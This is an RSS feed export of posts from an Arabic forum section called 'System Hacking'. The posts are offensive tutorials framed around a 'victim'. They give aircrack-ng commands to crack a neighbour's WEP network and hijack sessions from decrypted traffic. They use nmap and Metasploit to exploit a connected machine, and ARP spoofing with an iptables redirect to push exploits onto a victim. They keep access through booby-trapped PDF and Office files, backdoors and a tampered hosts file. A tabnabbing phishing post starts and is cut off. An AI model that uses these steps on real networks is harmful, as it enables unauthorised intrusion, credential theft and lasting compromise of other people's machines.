<?xml version="1.0" encoding="windows-1256"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>خدمات العرب - System Hacking</title>
		<link>http://www.arab4services.net/forums/</link>
		<description>كل مايتعلق بامور الانظمة وطرق إختراقها</description>
		<language>ar-sa</language>
		<lastBuildDate>Fri, 03 Sep 2010 01:53:29 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://www.arab4services.net/forums/images/misc/rss.jpg</url>
			<title>خدمات العرب - System Hacking</title>
			<link>http://www.arab4services.net/forums/</link>
		</image>
		<item>
			<title>الاختراق من صفر حصريآ الجزء الاول</title>
			<link>http://www.arab4services.net/forums/showthread.php?t=2581&amp;goto=newpost</link>
			<pubDate>Sun, 29 Aug 2010 13:08:03 GMT</pubDate>
			<description>السلام عليكم ورحمه الله وبركاته  
 
درس اليوم عباره عن جزئين.  
 
تتمحور على قصه هآكر وضحيه , والهآكر did his best !!! ;) 
 
الجزء الاول  
1- اختراق...</description>
			<content:encoded><![CDATA[<div><div style="margin:auto;text-align:center;"><a href="http://www.arab4services.net/forums/showthread.php?t=2581" >الاختراق من صفر حصريآ الجزء الاول</a><br /><br /></div>السلام عليكم ورحمه الله وبركاته <br />
<br />
درس اليوم عباره عن جزئين. <br />
<br />
تتمحور على قصه هآكر وضحيه , والهآكر did his best !!! ;)<br />
<br />
الجزء الاول <br />
1<font color="DarkRed">- اختراق شبكه لاسليكه<br />
2- التجسس على الشبكه اللا سلكيه بأسلوب خفي <br />
3-معرفه المتواجدين على الشبكه <br />
4-فحص المنافذ لأحد المتصلين بالشبكه بأستخدام </font><font color="DarkOrange">nmap</font> <font color="DarkRed">واستخدام</font> <font color="DarkOrange">NSE</font><br />
-5 <font color="DarkRed">استغلال ثغره من داخل</font> <font color="DarkOrange">metasploit</font> <br />
<font color="DarkRed">6- المحافظه على الضحيه</font> <br />
<br />
____________________<br />
<br />
من المعروف ان تشفير <font color="DarkOrange">WEP</font> من اسهل التشفيرات كسراً بالنسبه للشبكه اللاسلكيه <br />
<br />
وايضا تشفير <font color="DarkOrange">WPA</font> ليس بذلك الصعوبه <br />
<a href="http://www.wpacracker.com/" target="_blank">http://www.wpacracker.com/</a><br />
;)<br />
<br />
<font color="DarkRed">1- كسر تشفير الشبكه اللاسلكيه .</font><br />
نوع الهجوم <font color="DarkOrange">Fragmentation Attack</font> , بالنسبه لي هذا الهجوم اللي استخدمه دائما لسببين . <br />
أ- سريع <br />
ب- قوي جدا .<br />
<br />
الميكانزم لهذا الهجوم ليست بتلك صعبه , (اقصد كيفيه تم هذا الهجوم ) لكن الحق يقال واجهة صعوبه في فهمها لكن مع القرائه والتطبيق وضح لك شيء  <br />
<br />
المهم , تجدها هنا <br />
<a href="http://www.informit.com/guides/content.aspx?g=security&amp;seqNum=305" target="_blank">http://www.informit.com/guides/conte...ity&amp;seqNum=305</a><br />
<br />
نبدأ في الاوامر <div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB"><br />airodump</span><span style="color: #007700">-</span><span style="color: #0000BB">ng&nbsp;mon0&nbsp;&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">c&nbsp;4&nbsp;</span><span style="color: #007700">--</span><span style="color: #0000BB">bssid&nbsp;00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">w&nbsp;crack&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div>mon0<br />
<br />
كرت الشبكه لدي <br />
<br />
c- <br />
<br />
يقصد بها رقم القناه التي يستخدمها <font color="DarkOrange">AP</font> <br />
<br />
bssid-- <br />
<br />
الماك ادرس للـ <font color="DarkOrange">AP</font> <br />
<br />
-w<br />
اسم الملف الذي سيحفظ فيه الحزم .<br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">aireplay</span><span style="color: #007700">-</span><span style="color: #0000BB">ng&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">1&nbsp;0&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">a&nbsp;00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">h&nbsp;00</span><span style="color: #007700">:</span><span style="color: #0000BB">11</span><span style="color: #007700">:</span><span style="color: #0000BB">22</span><span style="color: #007700">:</span><span style="color: #0000BB">33</span><span style="color: #007700">:</span><span style="color: #0000BB">44</span><span style="color: #007700">:</span><span style="color: #0000BB">55&nbsp;mon0&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div>-1<br />
<font color="DarkOrange">fake authentication</font><br />
هو نوع الهجوم<br />
<br />
ومعناه اننا نتظاهر بالاتصال مع <font color="DarkOrange">AP</font><br />
<br />
-a<br />
<br />
الماك ادرس الخاص للـ <font color="DarkOrange">AP</font><br />
<br />
h-<br />
<br />
الماك ادرس الخاص بكرت الشبكه<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">packetforge</span><span style="color: #007700">-</span><span style="color: #0000BB">ng&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">0&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">a&nbsp;00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">h&nbsp;00</span><span style="color: #007700">:</span><span style="color: #0000BB">11</span><span style="color: #007700">:</span><span style="color: #0000BB">22</span><span style="color: #007700">:</span><span style="color: #0000BB">33</span><span style="color: #007700">:</span><span style="color: #0000BB">44</span><span style="color: #007700">:</span><span style="color: #0000BB">55&nbsp;mon0&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">l&nbsp;255.255.255.255&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">k&nbsp;255.255.255.255&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">y&nbsp;</span><span style="color: #007700">*.xor&nbsp;-</span><span style="color: #0000BB">w&nbsp;silv3r00t&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div>-0 <br />
 عمل <font color="DarkOrange">arp packet</font> مزوره <br />
<br />
w- <br />
<br />
كتابة<font color="DarkOrange"> arp packet</font> في ملف <br />
<br />
# بأمكانك عدم كتابة <br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">l</span><span style="color: #007700">-<br /></span><span style="color: #0000BB">k</span><span style="color: #007700">-&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div><div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">aircrack</span><span style="color: #007700">-</span><span style="color: #0000BB">ng&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">n&nbsp;128&nbsp;crack</span><span style="color: #007700">-</span><span style="color: #0000BB">01.cap&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div>;)<br />
<br />
<font color="DarkRed">-2 التجسس على الشبكه اللاسلكيه بأسلوب خفي . </font><br />
<br />
هذه من الهجمات القويه لان ببساطه المهاجم لا يملك IP :confused:<br />
<br />
نوع الهجوم راح يكون <font color="DarkOrange">sniffing &amp; session hijacking </font><br />
<br />
الكل يعرف <font color="DarkOrange">sniffing</font> لكن session<font color="DarkOrange"> hijacking</font>هو الدخول الى يوزر بدون باسورد<br />
<br />
فقط اختطاف الكوكيز او الاستحواذ على اتصال الضحيه .<br />
مثال: <br />
<br />
<font color="DarkOrange">SiLv3r00t</font> : الضحيه<br />
<br />
<font color="DarkOrange">Hacker</font> = المهاجم<br />
<br />
<font color="DarkOrange">Google.com</font> = الموقع اللي موجود به الحساب<br />
<br />
<br />
<font color="DarkOrange">SiLv3r00t ------------&gt;Google.com<br />
</font><br />
اتصلت بالموقع الان وارسلت اليوزر والباسورد .<br />
<br />
بعد مده جاء <font color="DarkOrange">Hacker</font> وطبق <font color="DarkOrange">Hijacking</font><br />
<br />
المهاجم الان اختطف اتصالي وصار يدخل الموقع على اتصالي<br />
انواعه :<br />
<font color="Red"><br />
Active -1<br />
Passive -2</font><br />
<font color="Red"><br />
Active :</font><br />
<br />
اللي ذكرته بالمثال , بشكل اوضح الهاكر يشوف اتصال  <br />
<font color="Red"><br />
Passive :</font><br />
<br />
الهاكر يجمع اتصال الضحيه ثم يقوم بالهجوم<br />
<br />
نستنج ان<font color="DarkOrange"> Active</font> يحتاج ان يكون الضحيه <font color="DarkOrange">online</font> بعكس <font color="DarkOrange">passive</font><br />
<br />
الذي لا يحتاج .<br />
<br />
session Hijacking ينقسم الى قسمين<br />
<font color="Red"><br />
1- Network level hijacking<br />
<br />
Application level hijacking -2<br />
</font><br />
<br />
<font color="Red">Network level hijacking :</font><br />
<br />
اختطاف الاتصال الذي بين الضحيه والسيرفر ويحدث دائما في<font color="DarkOrange"> TCP ,UDP</font><br />
<br />
<font color="Red">Application level hijacking :</font><br />
<br />
اختطاف الكوكيز او الطلب <font color="DarkOrange">GET</font> للدخول الى حساب الضحيه ويحدث غالبا في <font color="DarkOrange">HTTP</font><br />
<br />
صراحه الحديث يطول عن هذا الهجوم , لكن انا قدمت لكم بشكل سريع وبسيط<br />
<br />
<br />
نرجع لمحور حديثنا , كيف راح يتم عمل <font color="DarkOrange">session Hijacking</font><br />
<br />
بأسلوب خفي , نبي نحسس الضحيه ان المهاجم غير موجود بالشبكه<br />
<br />
<br />
مستحيله اذا كان الضحيه يشتغل عن طريق واير لكن اذا الضحيه كان يشتغل عن طريق وايرلس<br />
<br />
راح نسرقه بدون ما نتصل بالمودم<br />
<br />
بأستخدام حزمه <font color="DarkOrange">aircrack-ng</font> راح نسرق الاتصال ومن ثم نقوم<br />
<br />
بعمل <font color="DarkOrange">hijacking</font> , نوع هجومي راح يكون <font color="DarkOrange">Passive</font><br />
<br />
اولا راح نجمع الحزم في ملف ثم نقوم بفك تشفيرها ان تطلب الامر <br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">airodump</span><span style="color: #007700">-</span><span style="color: #0000BB">ng&nbsp;mon0&nbsp;&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">c&nbsp;4&nbsp;</span><span style="color: #007700">--</span><span style="color: #0000BB">bssid&nbsp;00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00</span><span style="color: #007700">:</span><span style="color: #0000BB">00&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">w&nbsp;crack&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div>بعدها نقوم بفك التشفير عن طريق اداه <br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">airdecap</span><span style="color: #007700">-</span><span style="color: #0000BB">ng&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">w&nbsp;KEY&nbsp;crack</span><span style="color: #007700">*.</span><span style="color: #0000BB">cap&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div>واخر وليس اخيرا استخدام <font color="DarkOrange">ferret</font> <br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">ferret&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">r&nbsp;crack</span><span style="color: #007700">-</span><span style="color: #0000BB">decap</span><span style="color: #007700">.</span><span style="color: #0000BB">cap&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div><font color="DarkRed">3- -معرفه المتواجدين على الشبكه </font><br />
<br />
معرفه المتواجدين على الشبكه سهل جدا بل بأمكانك استخدام <font color="DarkOrange">built-in tools</font> بمعنى اخر <br />
<br />
ممكن تكتب سكربت <font color="DarkOrange">bash</font> بسيط .<br />
<br />
المهم انا راح استخدم اداه <font color="DarkOrange">netdiscover</font> <br />
<br />
<div style="margin:20px; margin-top:5px">
	<div class="smallfont" style="margin-bottom:2px">كود PHP:</div>
	<div class="alt2">
		<hr />
		<code style="white-space:nowrap">
		<div dir="ltr" style="text-align:left;">
			<!-- php buffer start --><code><span style="color: #000000">
<span style="color: #0000BB">netdiscover&nbsp;</span><span style="color: #007700">-</span><span style="color: #0000BB">r&nbsp;192.168.1.1</span><span style="color: #007700">/</span><span style="color: #0000BB">24&nbsp;<br /></span>
</span>
</code><!-- php buffer end -->
		</div>
		</code>
		<hr />
	</div>
</div><br />
4<font color="DarkRed">- فحص المنافذ لأحد المتصلين بالشبكه بأستخدام</font> <font color="DarkOrange">nmap</font> <font color="DarkRed">واستخدام</font> <font color="DarkOrange">NSE</font><br />
<br />
اداة <font color="DarkOrange">nmap </font>من اهم ادوات الهكر وتعتبر من اقوى الادوات الموجوده . <br />
<br />
الفديو راح يظهر قوة <font color="DarkOrange">NSE</font> <br />
<br />
5- استغلال ثغره من داخل<font color="DarkOrange"> metasploit</font>  <br />
<br />
بعد ما نعرف المنافذ المفتوحه ايضا فيها ثغرها عن طريق <font color="DarkOrange">nmap</font> راح يتم استغلال ثغره <br />
<br />
ينصح استخدام <font color="DarkOrange">meterpreter</font> دائما <br />
<br />
6- المحافظه على الضحيه . <br />
<br />
راح احافظ على ضحيتي بتلغيم ملفاته بثغرات البرامج فمثلا لو عند الضحيه كتب<font color="DarkOrange"> pdf</font> <br />
<br />
راح احملها بجهازي واستخدم <font color="DarkOrange">metasploit</font> لتلغيم وابدلها بالملفات الحقيقيه <br />
<br />
او حتى تلغيم ملفات<font color="DarkOrange">microsoft office</font>  او اي برامج اخرى . <br />
<br />
اما الطريقه الاخرى وهي تحميل باكدور يشتغل بعد كل 17 ساعه وبأمكانك ايضا تشغيله عند اعاده تشغيل الكمبيوتر. بأستخدام نفس السكربت في الفديو . <br />
<br />
للأفاده: ممكن تستخدم <font color="DarkOrange">tftp</font> , واللبيب بالأشارة يفهمُ . ;)<br />
<br />
الفديو : <a href="http://www.youtube.com/watch?v=kAXaTv4ZT6k" target="_blank">http://www.youtube.com/watch?v=kAXaTv4ZT6k</a><br />
<br />
في الجزء الثاني راح يكتشف الضحيه ان هآكر يتصل عن طريق شبكته اللاسلكيه  لكن في جعبت الهآكر الكثير . &lt; اقول الخلا :D</div>

]]></content:encoded>
			<category domain="http://www.arab4services.net/forums/forumdisplay.php?f=56">System Hacking</category>
			<dc:creator>SiLv3r00t</dc:creator>
			<guid isPermaLink="true">http://www.arab4services.net/forums/showthread.php?t=2581</guid>
		</item>
		<item>
			<title><![CDATA[الاختراق بذكاء والمحافظه على الضحيه Metasploit &arp spoofing]]></title>
			<link>http://www.arab4services.net/forums/showthread.php?t=2539&amp;goto=newpost</link>
			<pubDate>Wed, 25 Aug 2010 16:32:52 GMT</pubDate>
			<description><![CDATA[السلام عليكم ورحمه الله وبركاته  
 
درس اليوم راح يتطرق لنقطتين  . النقطه الاولى وهي الهجوم بأستخدام metasploit & arp spoofing 
 
والنقطه الثانيه هي...]]></description>
			<content:encoded><![CDATA[<div><div style="margin:auto;text-align:center;"><a href="http://www.arab4services.net/forums/showthread.php?t=2539" >الاختراق بذكاء والمحافظه على الضحيه Metasploit &amp;arp spoofing</a><br /><br /></div>السلام عليكم ورحمه الله وبركاته <br />
<br />
درس اليوم راح يتطرق لنقطتين  . النقطه الاولى وهي الهجوم بأستخدام <font color="DarkOrange">metasploit &amp; arp spoofing</font><br />
<br />
والنقطه الثانيه هي المحافظه على الضحيه بطريقه ذكيه. <br />
<br />
قبل لا ابدأ , هذا الموضوع للغرض العلمي فقط !! <br />
<br />
_______________<br />
<br />
الهجمات المستخدمه في هذا الدرس <br />
<font color="Red">1- client-side attack <br />
2- ARP poisoning attack</font><br />
<br />
<font color="red">client-side attack </font><br />
<br />
هجوم يقوم به الهاكر ولكن دينماكيه عمله هو ان يكون الهاكر في عمليه تنصت على منفذ معين بحيث ان اتصل الضحيه على هذا المنفذ يقوم الهاكر بأستغلال ثغره <br />
مثال : <br />
<font color="DarkRed">1<br />
victim ------------------------&gt; attacker<br />
<br />
2<br />
victim &lt;---------------------------------- attacker<br />
<br />
3<br />
victim -----------------------------------&gt; attacker</font><br />
<br />
نلاحظ ان اول السينارويو ,<br />
<br />
1- الضحيه اتصل بالمهاجم<br />
2- المهاجم ارسل الثغره وبنفس الوقت الضحيه شغل الثغره<br />
3- حصلنا على اتصال عكسي<br />
<br />
<font color="red">Arp poisoning attack </font><br />
<br />
هذا الهجوم يكون الطبقه الثانيه من <font color="darkorange">OSI model </font>ودينماكيه عمله هو ارسال حزمة <font color="darkorange">ARP </font> مزوره داخل الشبكه . <br />
<br />
~~~~~~~~~<br />
<br />
الكل على معرفه بأن <font color="darkorange">ARP poisoning </font>يستخدم لتمرير جميع الحزم عن طريق المهاجم <br />
<br />
مثلا هذا الاتصال اللي يصير داخل الشبكه بدون هجوم <font color="DarkOrange">ARP poisoning</font><br />
<br />
 <font color="darkred">computer  &gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;   Gateway</font><br />
<br />
لكن لو هجمنا هجوم <font color="darkorange">ARP poisoning </font>راح يكون الاتصال<br />
<font color="DarkRed"><br />
 computer  &gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;   SiLv3r00t  &gt;&gt;&gt;&gt;&gt;&gt;&gt;&lt;&lt;&lt;&lt;&lt;&lt;   Gateway</font><br />
<br />
# في هذا المثال تم عمل <font color="DarkOrange">ARP poisoning </font>للبوابه والضحيه . <br />
<br />
وبأمكانك القيام بهذا الهجوم بأستخدام <font color="darkorange">Arpspoof</font> من حزمه <font color="darkorange">dsniff</font> <br />
<br />
لامر :<br />
<font color="Silver"><br />
arpspoof -i eth0 -t victim Gateway<br />
<br />
eth0 : my interface</font><br />
ملاحظه : يجب السماح  بتمرير جميع الحزم عن طريق جهازك<br />
<font color="silver"><br />
linux :<br />
<br />
echo 1 &gt; /proc/sys/net/ipv4/ip_forward<br />
<br />
Windows : </font><br />
<a href="http://support.microsoft.com/kb/315236" target="_blank">http://support.microsoft.com/kb/315236</a><br />
<br />
ننتقل للمهم . <br />
<br />
بعدما عملنا هجوم <font color="DarkOrange">arp poisoning </font>, هل هدفنا هو التجسس ؟!<br />
<br />
لا , ونعم في نفس الوقت ! <br />
<br />
هدفنا ليس قرائه الحزم بل اجبار الضحيه على تشغيل ثغره  :-) <br />
<br />
بعد عمل <font color="darkorange">ARP attack</font> , راح يكون موقعنا في الوسط بمعنى اخر راح نكون بين الضحيه والبوابه . <br />
<br />
نستنج ان جميع الحزم ستمر عن طريق جهازنا بما فيها حزم من بروتوكول HTTP :)<br />
<br />
اتوقع الان الفكره وضحت . <br />
<br />
المهاجم راح يتجسس على حزم من البروتوكول<font color="darkorange"> HTTP </font>بما فيها طلبات <font color="darkorange">GET</font> <br />
<br />
مثلا لو دخلنا موقع <a href="http://www.google.com/" target="_blank">www.google.com/</a> راح يتم ارسال حزمه ويكون داخلها <br />
<br />
<font color="darkred">GET / HTTP/1.1</font><br />
<br />
الان طلبنا بعرض / <br />
<br />
لكن لو طلبنا شيء معين ليكن <font color="darkorange">silv3r00t.html</font><br />
<br />
<font color="DarkRed">GET /silv3r00t.html HTTP/1.1</font><br />
<br />
<br />
لكن لو صار metasploit متنصت على منفذ 80 وعلى المسار /  . اكيد الثغره راح تشتغل <br />
<br />
اذا تم طلب / <br />
<br />
لكن لو الضحيه طلب <font color="darkorange">silv3r00t.html</font> الثغره لن تعمل . <br />
<br />
الرابط لدى الضحيه لن يتغير . <br />
<br />
# من المهم عمل قانون في iptables ليتم تحوله للمنفذ المتنصت عليه ويفضل ان يكون 80 <br />
<font color="DarkRed">iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 80</font><br />
<br />
فكره الهجوم ممكن استخدامه بأكثر من طريقه (just think) ;)<br />
<br />
<br />
الان نروح للنقطه الثانيه وهي المحافظه على الضحيه . <br />
<br />
المحافظه على الضحيه تأتي على حسب تفكير الهاكر فمثلا تشغيل خدمه <font color="darkorange">TELNET </font><br />
<br />
او عمل <font color="darkorange">backdoor</font> بحيث يشتغل بعد مده من الزمن او بعد اعاده تشغيل جهاز الضحيه <br />
<br />
او حتى عمل ملف <font color="darkorange">bat</font> يقوم بالمحافظه على الضحيه ;) <br />
<br />
لكن جميع هذا الطرق خطره وذلك اولا بأمكان اي شخص الدخول لجهاز الضحيه عن طريق خدمه <font color="darkorange">TELNET</font> (بوجود الرقم السري طبعا )<br />
<br />
او حتى تنزيل <font color="darkorange">backdoor</font> خطر لان ببساطه الـ <font color="darkorange">backdoor</font> يعتبر ملف خبيث <br />
<br />
لذلك الطريقه اللي راح اتكلم عنها هي التلاعب في ملف <font color="darkorange">hosts</font> لدى الضحيه <br />
<br />
هذا الملف يحوي على عناوين المواقع . <br />
<br />
توضيح : <br />
<br />
الان لو ان الضحيه اراد دخول موقع <font color="darkorange">google.com</font> . اول شيء يعمله جهاز الضحيه هو قرائه ملف <font color="darkorange">hosts</font> <br />
<br />
فأن لم يجد الـ IP الخاص بموقع <font color="darkorange">google.com</font> , راح يرسل رساله للـ <font color="DarkOrange">DNS server</font> <br />
<br />
&quot;ارسل لي الـ <font color="darkorange">ip</font> الخاص بموقع <font color="darkorange">google.com </font>&quot; <br />
<br />
لكن لو اضفنا مُدخل بحيث ان موقع <font color="darkorange">google.com</font>  لديه IPالمهاجم :D <br />
<br />
بأختصار الفكره هي عمل صفحه ملغمه بحيث كل مره يدخل الضحيه موقع <font color="DarkOrange">google.com</font> تقوم بتشغيل الثغره .<br />
<br />
<a href="http://www.youtube.com/watch?v=55qo2w2Yp70" target="_blank">http://www.youtube.com/watch?v=55qo2w2Yp70</a><br />
<br />
<font color="Red">الف شكر لأخوي Al-AlaME لرفع هذا الفديو على قناة الموقع </font></div>

]]></content:encoded>
			<category domain="http://www.arab4services.net/forums/forumdisplay.php?f=56">System Hacking</category>
			<dc:creator>SiLv3r00t</dc:creator>
			<guid isPermaLink="true">http://www.arab4services.net/forums/showthread.php?t=2539</guid>
		</item>
		<item>
			<title>DHCP Spoofing and Starvation</title>
			<link>http://www.arab4services.net/forums/showthread.php?t=2538&amp;goto=newpost</link>
			<pubDate>Wed, 25 Aug 2010 14:50:04 GMT</pubDate>
			<description><![CDATA[السلام عليكم 
 
هذا الكتاب يتحدث عن نوعين من الهجمات يستهدف سرفرت DHCP او ما يسمى 
 
&#8235; &#8234;Dynamic Host Configuration Protocol&#8236;&#8236; 
 
...]]></description>
			<content:encoded><![CDATA[<div><div style="margin:auto;text-align:center;"><a href="http://www.arab4services.net/forums/showthread.php?t=2538" >DHCP Spoofing and Starvation</a><br /><br /></div>السلام عليكم<br />
<br />
هذا الكتاب يتحدث عن نوعين من الهجمات يستهدف سرفرت DHCP او ما يسمى<br />
<br />
&#8235; &#8234;Dynamic Host Configuration Protocol&#8236;&#8236;<br />
<br />
<br />
<a href="http://www.exploit-db.com/download_pdf/14836" target="_blank">http://www.exploit-db.com/download_pdf/14836</a><br />
<br />
لو هنالك اي سؤال او استفسار . حاضر للاجابة<br />
<br />
لكم كل الود والتحية .</div>

]]></content:encoded>
			<category domain="http://www.arab4services.net/forums/forumdisplay.php?f=56">System Hacking</category>
			<dc:creator>rOckHuntEr</dc:creator>
			<guid isPermaLink="true">http://www.arab4services.net/forums/showthread.php?t=2538</guid>
		</item>
		<item>
			<title>حصري ولأول مرة : اختراق حسابات المستخدمين عن طريق ( Tab ) المتصفح !</title>
			<link>http://www.arab4services.net/forums/showthread.php?t=2453&amp;goto=newpost</link>
			<pubDate>Sat, 14 Aug 2010 09:18:36 GMT</pubDate>
			<description>*بسم الله الرحمن الرحيم .. 
 
السلام عليكم ورحمة الله وبركاته .. اما بعد  
 
صباح \ مساء الخير على جميع اعضاء المنتدى بلا استثناء .. 
 
ها انا ذا...</description>
			<content:encoded><![CDATA[<div><div style="margin:auto;text-align:center;"><a href="http://www.arab4services.net/forums/showthread.php?t=2453" >حصري ولأول مرة : اختراق حسابات المستخدمين عن طريق ( Tab ) المتصفح !</a><br /><br /></div><div align="center"><font color="Black"><b>بسم الله الرحمن الرحيم ..<br />
<br />
السلام عليكم ورحمة الله وبركاته .. اما بعد <br />
<br />
صباح \ مساء الخير على جميع اعضاء المنتدى بلا استثناء ..<br />
<br />
ها انا ذا اعود اليكم من جديد بالحصري و المفيد &lt; سجع :D<br />
<br />
من زمان عن المنتدى .. و من زمان عن المواضيع .. و من زمان عن الردود ..  <br />
<br />
ظروفي الدراسية ما كانت تسمح لي اشارك بكثرة اطلاقا :D <br />
<br />
لكن الحمد لله فرجت .. ووصلنا لما نريد !<br />
<br />
اليوم راح نتكلم في موضوع خطير شوي</b></font> :rolleyes:<br />
<br />
<font color="Black"><b>موضوعنا اليوم يتكلم عن الاختراق بالـ</b></font> <font color="Red"><b>Tabnabbing</b></font> <font color="Black"><b>.. &lt; اللي يفهم انجلش راح يفهم المغزى من هالكلمتين بس .. </b></font><br />
<br />
<font color="Black"><b>طبعا يعتبر هذا الهجوم .. نوع من انواع الهندسة الاجتماعية اللي ما تخفى على الجميع بكل تآكيد !<br />
<br />
و كل ما نريده من هذا الهجوم .. هو الوصول لحسابات المستخدمين ( الضحايا ) سواء في الهوتميل او الياهو او الجيميل .. الخ !<br />
<br />
من المؤكد ان كل شخص يعرف ماهو الـ</b></font> <font color="Red"><b>Tab</b></font> <font color="Black"><b>.. اللي هو طبعا فتح اطار جديد في المتصفح !</b></font><br />
<br />
<font color="Black"><b>و اكيد كل وآحد فينا يفتح الكثير من الاطارات لكثير من المواقع .. و هذا شيء معروف سلفا ..<br />
<br />
الخبث يكون في اطار وآحد من هذه الاطارات .. الذي يكون بداخله شفرة جافا سكربت بحيث اذا تم الانتقال لاي اطار آخر .. يتحول محتوى هذه الصفحة الى الموقع الذي عليه حساب المستخدم <br />
<br />
حلوو ..<br />
<br />
لنفرض الآن انه تم تحويل الصفحة الى موقع الهوتميل الشهير و الذي هو محدد مسبقا من قبلك بطبيعة الحال فماذا سيحدث للضحية ؟<br />
<br />
الضحية سوف ينظر الى صفحة تسجيل الدخول .. و يقع في الفخ .. و يرسل بريده الالكتروني بالاضافة الى كلمة السر كهدية للمخترق بحكم ان الموقع موثوق به ..<br />
<br />
المخترق يشرب الشاهي و ينتظر .. و اذا بكلمة السر و البريد امام ناظريه !<br />
<br />
و من ثم يتم تحويل الضحية الى سيرفر الهوتميل الاساسي كتمويه ممتاز !</b></font><br />
<br />
<br />
<br />
<font color="DeepSkyBlue"><b>------------------------------------------------------------------------------------<br />
</b></font><br />
<br />
<font color="Black"><b>الى الآن طريقة الهجوم .. اعتقد بانها توضحت جليا لكم <br />
<br />
